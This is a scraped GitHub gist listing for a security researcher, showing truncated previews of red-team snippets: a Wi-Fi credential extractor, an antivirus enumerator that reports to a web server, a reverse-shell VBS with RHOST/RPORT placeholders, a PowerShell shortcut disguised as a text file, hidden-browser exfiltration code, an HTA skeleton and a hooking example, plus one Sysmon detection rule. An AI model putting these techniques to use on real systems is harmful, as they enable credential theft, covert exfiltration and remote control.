I hereby claim:
- I am leoloobeek on github.
- I am leoloobeek (https://keybase.io/leoloobeek) on keybase.
- I have a public key ASCyIsv1dP110VtA9CuMQ7YPLZ758Seyi8O5hu_ww7ZDVgo
To claim this, I am signing this object:
Leo Loobeek leoloobeek
leoloobeek
/ keybase.md
Created
September 30, 2017 04:14
leoloobeek
/ Extract-WiFi-Creds.ps1
Created
October 3, 2017 02:14
— forked from gfoss/Extract-WiFi-Creds.ps1
Simple script to extract locally-stored Wi-Fi Credentials
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #====================================# | |
| # Extract Wi-Fi Credentials # | |
| # greg . foss @ owasp . org # | |
| # v0.1 -- July, 2017 # | |
| #====================================# | |
| # Licensed under the MIT License | |
| <# |
leoloobeek
/ enumAV.vbs
Last active
June 6, 2023 08:45
Enumerate AV and send to web server (based on https://blog.netspi.com/getting-started-wmi-weaponization-part-2/)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function Base64Encode(sText) | |
| dim DM, EL | |
| Set DM = CreateObject("Microsoft.XMLDOM") | |
| Set EL = DM.createElement("tmp") | |
| EL.DataType = "bin.base64" | |
| EL.NodeTypedValue = sText | |
| Base64Encode = EL.Text | |
| End Function | |
| Set wmiObj=GetObject("winmgmts:{impersonationLevel=impersonate}\\.\ROOT\SecurityCenter2") | |
| Set items = wmiObj.ExecQuery("Select * from AntiVirusProduct") |
leoloobeek
/ Encoder.vbs
Created
October 31, 2017 17:35
https://gallery.technet.microsoft.com/scriptcenter/16439c02-3296-4ec8-9134-6eb6fb599880
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Option Explicit | |
| dim oEncoder, oFilesToEncode, file, sDest | |
| dim sFileOut, oFile, oEncFile, oFSO, i | |
| dim oStream, sSourceFile | |
| set oFilesToEncode = WScript.Arguments | |
| set oEncoder = CreateObject("Scripting.Encoder") | |
| For i = 0 to oFilesToEncode.Count - 1 | |
| set oFSO = CreateObject("Scripting.FileSystemObject") |
leoloobeek
/ Command.vbs
Created
November 6, 2017 23:14
— forked from staaldraad/Command.vbs
Using VBSMeter with Ruler
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Call X() | |
| End Function | |
| Dim RHOST: RHOST = "x.x.x.x" | |
| Dim RPORT: RPORT = "8999" | |
| Function Base64ToStream(b) | |
| Dim enc, length, ba, transform, ms | |
| Set enc = CreateObject("System.Text.ASCIIEncoding") | |
| length = enc.GetByteCount_2(b) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Shell = New-Object -ComObject ("WScript.Shell") | |
| $ShortCut = $Shell.CreateShortcut($env:USERPROFILE + "\Desktop\MaliciousLink.lnk") | |
| $ShortCut.Arguments = " -W 1 -command ....." | |
| $ShortCut.TargetPath = "powershell" | |
| $ShortCut.IconLocation = "C:\Windows\System32\notepad.exe, 0"; | |
| $ShortCut.Description = "Type: Text Document"; | |
| $ShortCut.Save() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // sample function that takes in a destination server, POST data, and custom HTTP request headers | |
| private string SendData(string dst, byte[] postData, string customHeaders) | |
| { | |
| Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046")); | |
| object IE = Activator.CreateInstance(com_type); | |
| object[] falseArr = new object[] { false }; | |
| object[] trueArr = new object[] { true }; | |
| com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr); | |
| com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <script language="JScript"> | |
| // HTA skeleton taken from https://github.com/zerosum0x0/koadic | |
| window.resizeTo(1, 1); | |
| window.moveTo(-2000, -2000); | |
| window.blur(); | |
| try | |
| { |
leoloobeek
/ sysmon-config.xml
Created
December 19, 2017 17:36
Sysmon log loading of ieproxy.dll for detecting IE COM abuse
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!--SYSMON EVENT ID 7 : DLL (IMAGE) LOADED BY PROCESS--> | |
| <!--DATA: UtcTime, ProcessGuid, ProcessId, Image, ImageLoaded, Hashes, Signed, Signature, SignatureStatus--> | |
| <ImageLoad onmatch="include"> | |
| <ImageLoaded condition="end with">ieproxy.dll</ImageLoaded> | |
| </ImageLoad> | |
| <ImageLoad onmatch="exclude"> | |
| <Image condition="is">C:\Program Files (x86)\Internet Explorer\iexplore.exe</Image> | |
| <Image condition="is">C:\Program Files\internet explorer\iexplore.exe</Image> | |
| <Image condition="is">C:\Program Files (x86)\Internet Explorer\ielowutil.exe</Image> | |
| <Image condition="is">C:\Program Files\internet explorer\ielowutil.exe</Image> |
leoloobeek
/ Injectable.cpp
Created
December 19, 2017 18:37
— forked from anonymous/Injectable.cpp
Simple UserMode Hook Example
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| FARPROC fpCreateProcessW; | |
| BYTE bSavedByte; | |
| // Blog Post Here: | |
| // https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 | |
| // tasklist | findstr explore.exe |